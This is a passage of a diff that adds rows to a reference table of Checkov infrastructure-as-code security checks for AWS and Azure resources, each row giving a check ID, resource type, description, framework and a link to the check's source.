+| 1521 | CKV2_AWS_62 | resource | aws_s3_bucket | Ensure S3 buckets should have event notifications enabled | Terraform | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml) |
+| 1522 | CKV2_AWS_63 | resource | aws_networkfirewall_firewall | Ensure Network firewall has logging configuration defined | Terraform | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml) |
+| 1523 | CKV2_AWS_64 | resource | aws_kms_key | Ensure KMS key Policy is defined | Terraform | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml) |
+| 1524 | CKV2_AWS_65 | resource | aws_s3_bucket_ownership_controls | Ensure access control lists for S3 buckets are disabled | Terraform | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml) |
+| 1525 | CKV2_AWS_66 | resource | aws_mwaa_environment | Ensure MWAA environment is not publicly accessible | Terraform | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml) |
+| 1526 | CKV2_AWS_68 | resource | AWS::IAM::Role | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) |
+| 1527 | CKV2_AWS_68 | resource | AWS::SageMaker::NotebookInstance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) |
+| 1528 | CKV2_AWS_68 | resource | aws_iam_role | Ensure SageMaker notebook instance IAM policy is not overly permissive | Terraform | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) |
+| 1529 | CKV2_AWS_68 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Terraform | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) |
+| 1530 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | arm | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) |
+| 1531 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) |
+| 1532 | CKV_AZURE_1 | resource | azurerm_linux_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) |
+| 1533 | CKV_AZURE_1 | resource | azurerm_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) |
+| 1534 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | arm | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) |
+| 1535 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | Bicep | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) |
+| 1536 | CKV_AZURE_2 | resource | azurerm_managed_disk | Ensure Azure managed disk has encryption enabled | Terraform | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py) |
+| 1537 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | arm | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py) |
+| 1538 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | Bicep | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py) |
+| 1539 | CKV_AZURE_3 | resource | azurerm_storage_account | Ensure that 'enable_https_traffic_only' is enabled | Terraform | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py) |
+| 1540 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | arm | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) |
+| 1541 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | Bicep | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) |
+| 1542 | CKV_AZURE_4 | resource | azurerm_kubernetes_cluster | Ensure AKS logging to Azure Monitoring is Configured | Terraform | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py) |
+| 1543 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | arm | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) |
+| 1544 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | Bicep | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) |
+| 1545 | CKV_AZURE_5 | resource | azurerm_kubernetes_cluster | Ensure RBAC is enabled on AKS clusters | Terraform | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py) |
+| 1546 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | arm | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) |
+| 1547 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | Bicep | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) |
+| 1548 | CKV_AZURE_6 | resource | azurerm_kubernetes_cluster | Ensure AKS has an API Server Authorized IP Ranges enabled | Terraform | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py) |
+| 1549 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | arm | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) |
+| 1550 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | Bicep | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) |
+| 1551 | CKV_AZURE_7 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Network Policy configured | Terraform | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py) |
+| 1552 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | arm | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) |
+| 1553 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | Bicep | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) |
+| 1554 | CKV_AZURE_8 | resource | azurerm_kubernetes_cluster | Ensure Kubernetes Dashboard is disabled | Terraform | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py) |
+| 1555 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) |
+| 1556 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) |
+| 1557 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) |
+| 1558 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) |
+| 1559 | CKV_AZURE_9 | resource | azurerm_network_security_group | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) |
+| 1560 | CKV_AZURE_9 | resource | azurerm_network_security_rule | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) |
+| 1561 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) |
+| 1562 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) |
+| 1563 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) |
+| 1564 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) |
+| 1565 | CKV_AZURE_10 | resource | azurerm_network_security_group | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) |
+| 1566 | CKV_AZURE_10 | resource | azurerm_network_security_rule | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) |
+| 1567 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | arm | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) |
+| 1568 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases 
allow ingress from 0.0.0.0/0 (ANY IP) | Bicep | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | +| 1569 | CKV_AZURE_11 | resource | azurerm_mariadb_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1570 | CKV_AZURE_11 | resource | azurerm_mysql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1571 | CKV_AZURE_11 | resource | azurerm_postgresql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1572 | CKV_AZURE_11 | resource | azurerm_sql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1573 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1574 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | 
+| 1575 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1576 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1577 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1578 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1579 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1580 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1581 | CKV_AZURE_12 | resource | 
azurerm_network_watcher_flow_log | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Terraform | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py) | +| 1582 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 1583 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 1584 | CKV_AZURE_13 | resource | azurerm_app_service | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1585 | CKV_AZURE_13 | resource | azurerm_linux_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1586 | CKV_AZURE_13 | resource | azurerm_windows_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1587 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 1588 | CKV_AZURE_13 | resource | 
config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 1589 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | arm | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | +| 1590 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Bicep | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | +| 1591 | CKV_AZURE_14 | resource | azurerm_app_service | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1592 | CKV_AZURE_14 | resource | azurerm_linux_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1593 | CKV_AZURE_14 | resource | azurerm_windows_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1594 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | arm | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | +| 1595 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption 
| Bicep | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | +| 1596 | CKV_AZURE_15 | resource | azurerm_app_service | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1597 | CKV_AZURE_15 | resource | azurerm_linux_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1598 | CKV_AZURE_15 | resource | azurerm_windows_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1599 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | arm | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | +| 1600 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | Bicep | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | +| 1601 | CKV_AZURE_16 | resource | azurerm_app_service | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1602 | CKV_AZURE_16 | resource | azurerm_linux_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | 
[AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1603 | CKV_AZURE_16 | resource | azurerm_windows_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1604 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | arm | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | +| 1605 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Bicep | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | +| 1606 | CKV_AZURE_17 | resource | azurerm_app_service | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1607 | CKV_AZURE_17 | resource | azurerm_linux_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1608 | CKV_AZURE_17 | resource | azurerm_windows_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1609 | CKV_AZURE_18 | resource | 
Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | arm | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | +| 1610 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | Bicep | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | +| 1611 | CKV_AZURE_18 | resource | azurerm_app_service | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1612 | CKV_AZURE_18 | resource | azurerm_linux_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1613 | CKV_AZURE_18 | resource | azurerm_windows_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1614 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | arm | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | +| 1615 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | Bicep | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | +| 1616 | CKV_AZURE_19 | resource | 
azurerm_security_center_subscription_pricing | Ensure that standard pricing tier is selected | Terraform | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py) | +| 1617 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | arm | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | +| 1618 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | Bicep | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | +| 1619 | CKV_AZURE_20 | resource | azurerm_security_center_contact | Ensure that security contact 'Phone number' is set | Terraform | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py) | +| 1620 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | +| 1621 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | +| 1622 | CKV_AZURE_21 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | 
[SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py) | +| 1623 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | +| 1624 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | +| 1625 | CKV_AZURE_22 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py) | +| 1626 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | +| 1627 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | 